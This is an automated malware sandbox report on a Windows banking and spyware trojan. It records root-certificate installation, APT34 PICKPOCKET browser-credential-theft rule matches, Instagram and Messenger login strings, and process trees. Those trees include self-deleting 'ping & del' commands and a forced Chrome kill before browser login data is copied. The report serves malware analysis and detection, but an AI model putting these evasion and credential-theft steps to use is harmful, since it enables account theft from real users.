Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/autotrack/autotrack.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/lottie/lottie.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/modernizr/modernizr.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/ScrollMagic.min.js
Source: ecvFEAD.tmp.9.drString found in binary or memory: https://www.gstatic.com/external_hosted/scrollmagic/animation.gsap.min.js
Source: 56BB1610C0318054.exe, 00000004.00000003.372661016.0000000003D37000.00000004.00000001.sdmpString found in binary or memory: https://www.gstatic.com;
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accept:
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/accounts/login/ajax/facebook/
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/graphql/query/?query_hash=149bef52a3b2af88c0fec37913fe1cbc&variables=%7B%2
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.com/sec-fetch-site:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.instagram.comsec-fetch-mode:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/accept:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/login/nonce/
Source: 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.com/origin:
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpString found in binary or memory: https://www.messenger.comhttps://www.messenger.com/login/nonce/ookie:
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040AE4D OpenClipboard,9_2_0040AE4D
Source: Cyfj6XGbkd.exe, 00000000.00000002.365599254.000000000083A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

barindex
Registers a new ROOT certificateShow sources
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001F720 CryptStringToBinaryA,CryptStringToBinaryA,CertCreateCertificateContext,CertOpenStore,CertAddCertificateContextToStore,GetLastError,CertGetCertificateContextProperty,_memset,CertGetCertificateContextProperty,_memset,_memset,_sprintf,_sprintf,CertCloseStore,CertFreeCertificateContext,0_2_1001F720

System Summary:

barindex
Malicious sample detected (through community Yara rule)Show sources
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Author: unknown
PE file has a writeable .text sectionShow sources
Source: Cyfj6XGbkd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 56BB1610C0318054.exe.0.drStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019D40 LoadLibraryA,GetProcAddress,GetCurrentThread,NtSetInformationThread,0_2_10019D40
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019F00 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F00
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019F50 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019F50
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10019FA0 LoadLibraryA,GetProcAddress,GetCurrentProcess,NtQueryInformationProcess,0_2_10019FA0
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C516 NtQuerySystemInformation,9_2_0040C516
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040C6FB memset,CreateFileW,FindCloseChangeNotification,GetCurrentProcessId,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,NtQueryObject,CloseHandle,_wcsicmp,CloseHandle,FreeLibrary,9_2_0040C6FB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403660: DeviceIoControl,0_2_00403660
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403E2C0_2_00403E2C
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_004040500_2_00404050
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_004093D50_2_004093D5
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_00403FA90_2_00403FA9
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000C0630_2_1000C063
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000B8830_2_1000B883
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100060F00_2_100060F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100169BD0_2_100169BD
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100099E00_2_100099E0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100071F00_2_100071F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100092570_2_10009257
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_10010AED0_2_10010AED
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100083400_2_10008340
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000E3800_2_1000E380
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000ABA00_2_1000ABA0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000B3B00_2_1000B3B0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001EBD00_2_1001EBD0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100083F00_2_100083F0
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000BC570_2_1000BC57
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000C4830_2_1000C483
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_100105900_2_10010590
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1001EDDB0_2_1001EDDB
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: 0_2_1000FF710_2_1000FF71
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000C0632_2_1000C063
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000B8832_2_1000B883
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100060F02_2_100060F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100169BD2_2_100169BD
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100099E02_2_100099E0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100071F02_2_100071F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100092572_2_10009257
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_10010AED2_2_10010AED
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100083402_2_10008340
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000E3802_2_1000E380
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000ABA02_2_1000ABA0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000B3B02_2_1000B3B0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001EBD02_2_1001EBD0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100083F02_2_100083F0
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000BC572_2_1000BC57
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000C4832_2_1000C483
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_100105902_2_10010590
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1001EDDB2_2_1001EDDB
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: 2_2_1000FF712_2_1000FF71
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_00404BE49_2_00404BE4
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099A0C318_2_0099A0C3
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00996A1E18_2_00996A1E
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099963B18_2_0099963B
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099A7BB18_2_0099A7BB
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_0099B51C18_2_0099B51C
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00999B7F18_2_00999B7F
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeCode function: String function: 10010534 appears 35 times
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeCode function: String function: 10010534 appears 35 times
Source: 1611970637183.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: 1611970637183.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: Cyfj6XGbkd.exe, 00000000.00000002.365545591.0000000000680000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dllj% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365550326.0000000000690000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamenlsbres.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000000.342542352.0000000000412000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exe, 00000000.00000002.365576520.00000000007F0000.00000002.00000001.sdmpBinary or memory string: OriginalFilenamemswsock.dll.muij% vs Cyfj6XGbkd.exe
Source: Cyfj6XGbkd.exeBinary or memory string: OriginalFilenameVBCABLE_ControlPanel.exeJ vs Cyfj6XGbkd.exe
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dllJump to behavior
Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
Source: Cyfj6XGbkd.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: 00000000.00000002.366076006.00000000025E0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000002.00000002.413908813.0000000002810000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 00000004.00000002.378006718.0000000002560000.00000040.00000001.sdmp, type: MEMORYMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.10000000.6.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 0.2.Cyfj6XGbkd.exe.25e0000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.2560000.3.raw.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 4.2.56BB1610C0318054.exe.10000000.7.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.2.56BB1610C0318054.exe.2810000.5.unpack, type: UNPACKEDPEMatched rule: Ping_Command_in_EXE date = 2016-11-03, author = Florian Roth, description = Detects an suspicious ping command execution in an executable, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/, score =
Source: 2.3.56BB1610C0318054.exe.2e30000.0.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 2.2.56BB1610C0318054.exe.32e0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: 4.2.56BB1610C0318054.exe.31a0000.6.unpack, type: UNPACKEDPEMatched rule: APT34_PICKPOCKET Description = Detects the PICKPOCKET malware used by APT34, a browser credential-theft tool identified by FireEye in May 2018, Reference = https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html
Source: classification engineClassification label: mal93.bank.troj.spyw.evad.winEXE@32/37@4/3
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040CE93 CreateToolhelp32Snapshot,memset,Process32FirstW,OpenProcess,OpenProcess,OpenProcess,memset,GetModuleHandleW,GetProcAddress,QueryFullProcessImageNameW,QueryFullProcessImageNameW,CloseHandle,Process32NextW,FindCloseChangeNotification,9_2_0040CE93
Source: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exeCode function: 18_2_00991058 CoCreateInstance,18_2_00991058
Source: C:\Users\user\AppData\Roaming\1611970637183.exeCode function: 9_2_0040D9FC FindResourceW,SizeofResource,LoadResource,LockResource,9_2_0040D9FC
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile created: C:\Users\user\AppData\Local\Login Data1611970607033Jump to behavior
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4328:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_01
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello002
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign_task_Hello001
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeMutant created: \Sessions\1\BaseNamedObjects\Global\exist_sign__install_r3
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6304:120:WilError_01
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1972:120:WilError_01
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeJump to behavior
Source: Cyfj6XGbkd.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\AppData\Roaming\1611970637183.exeSystem information queried: HandleInformationJump to behavior
Source: C:\Windows\SysWOW64\taskkill.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process WHERE ( Caption = &quot;chrome.exe&quot;)
Source: C:\Windows\SysWOW64\msiexec.exeFile read: C:\Windows\win.iniJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: 56BB1610C0318054.exe, 00000002.00000002.414895413.00000000034AC000.00000004.00000001.sdmp, 56BB1610C0318054.exe, 00000004.00000002.380567426.000000000336C000.00000004.00000001.sdmpBinary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: Cyfj6XGbkd.exeVirustotal: Detection: 40%
Source: Cyfj6XGbkd.exeMetadefender: Detection: 24%
Source: Cyfj6XGbkd.exeReversingLabs: Detection: 58%
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeFile read: C:\Users\user\Desktop\Cyfj6XGbkd.exeJump to behavior
Source: unknownProcess created: C:\Users\user\Desktop\Cyfj6XGbkd.exe 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01
Source: unknownProcess created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\syswow64\MsiExec.exe -Embedding C6BE2003C858D11BE040843C2C46EAA2 C
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exe
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: unknownProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'
Source: unknownProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'
Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Windows\SysWOW64\msiexec.exe msiexec.exe /i 'C:\Users\user\AppData\Local\Temp\gdiview.msi'Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 0011 user01Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe 200 user01Jump to behavior
Source: C:\Users\user\Desktop\Cyfj6XGbkd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\Desktop\Cyfj6XGbkd.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Users\user\AppData\Roaming\1611970637183.exe 'C:\Users\user\AppData\Roaming\1611970637183.exe' /sjson 'C:\Users\user\AppData\Roaming\1611970637183.txt'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe C:\Users\user\AppData\Local\Temp\download\ThunderFW.exe ThunderFW 'C:\Users\user\AppData\Local\Temp\download\MiniThunderPlatform.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c taskkill /f /im chrome.exeJump to behavior
Source: C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c ping 127.0.0.1 -n 3 & del 'C:\Users\user\AppData\Local\Temp\56BB1610C0318054.exe'Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\taskkill.exe taskkill /f /im chrome.exeJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3 Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 3
Source: C:\Windows\SysWOW64\msiexec.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{000C103E-0000-0000-C000-000000000046}\InProcServer32Jump to behavior
